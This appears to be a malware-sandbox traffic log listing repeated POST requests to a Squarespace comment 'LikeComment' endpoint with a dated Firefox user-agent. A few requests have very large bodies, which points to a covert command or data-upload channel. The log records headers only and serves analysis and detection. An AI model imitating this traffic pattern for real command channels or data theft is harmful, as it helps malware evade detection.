Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 332Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108438Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108438Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 336Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 336Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 336Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
